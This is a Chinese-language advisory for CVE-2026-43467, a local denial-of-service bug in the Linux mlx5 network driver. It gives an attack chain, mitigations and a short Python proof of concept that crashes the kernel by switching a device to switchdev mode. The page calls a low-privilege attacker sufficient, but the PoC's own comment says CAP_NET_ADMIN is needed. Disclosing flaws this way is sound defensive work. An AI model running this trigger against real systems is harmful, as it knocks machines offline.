CVE-2026-43467 CVSS 5.5 中危

CVE-2026-43467 Linux内核mlx5驱动崩溃漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43467

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的net/mlx5驱动程序存在一个安全漏洞。当设备硬件不支持IPsec功能时，如果尝试将设备切换到switchdev模式，驱动程序会错误地尝试清理并未初始化的IPsec资源。由于缺少必要的能力检查，这种操作会导致空指针解引用，进而引发系统内核崩溃。该漏洞允许本地低权限攻击者触发拒绝服务，影响系统可用性。

技术细节

该漏洞位于Linux内核的net/mlx5驱动模块中，具体触发路径涉及设备模式切换。当用户通过devlink工具将网卡设备设置为switchdev模式时，驱动会执行`mlx5e_nic_disable`函数。在此过程中，代码调用了`mlx5e_ipsec_disable_events`来清理IPsec资源。然而，如果底层设备不支持IPsec，相应的资源结构体并未被分配，导致代码在尝试对其执行自旋锁操作（`_raw_spin_lock_irqsave`）时访问了空指针或无效内存地址（日志显示为0xa0）。这触发了`do_user_addr_fault`，导致内核WARNING及系统崩溃。攻击者需具备本地低权限（PR:L）即可执行该操作，不需要用户交互（UI:N），最终导致系统可用性完全丧失（A:H）。

攻击链分析

STEP 1

1. 本地访问

攻击者获得目标Linux系统的本地访问权限，且拥有低权限用户账号。

STEP 2

2. 识别设备

攻击者确认系统上搭载了Mellanox网卡（mlx5_core驱动），且该设备不支持IPsec硬件卸载。

STEP 3

3. 执行触发指令

攻击者利用devlink工具或调用相关Netlink API，执行将网卡模式切换为switchdev的命令。

STEP 4

4. 系统崩溃

驱动程序在清理未初始化的IPsec资源时发生空指针解引用，导致内核崩溃，系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-43467
# This script attempts to trigger the crash by switching to switchdev mode
# on a device that does not support IPsec.

import subprocess
import sys

def trigger_vulnerability(device_pci):
    try:
        # Command to switch eswitch mode to switchdev
        # This requires CAP_NET_ADMIN capability
        cmd = ["devlink", "dev", "eswitch", "set", device_pci, "mode", "switchdev"]
        print(f"[*] Executing: {' '.join(cmd)}")
        result = subprocess.run(cmd, capture_output=True, text=True)
        print(result.stdout)
        print(result.stderr)
        # If the system crashes here, the vulnerability is triggered
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Example PCI address, replace with actual vulnerable device
    # e.g., "pci/0000:03:00.0"
    if len(sys.argv) < 2:
        print("Usage: python3 poc.py <pci_device_address>")
        sys.exit(1)
    trigger_vulnerability(sys.argv[1])

影响范围

Linux Kernel < 6.19.0-rc5 (Specific commits fix this)

防御指南

临时缓解措施

由于该漏洞需要本地权限且涉及网络设备配置，最有效的临时缓解措施是限制非特权用户对网络配置工具的访问权限（如通过capabilities或sudoers）。此外，在未应用补丁前，管理员应避免在不支持IPsec的Mellanox网卡上配置switchdev模式。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表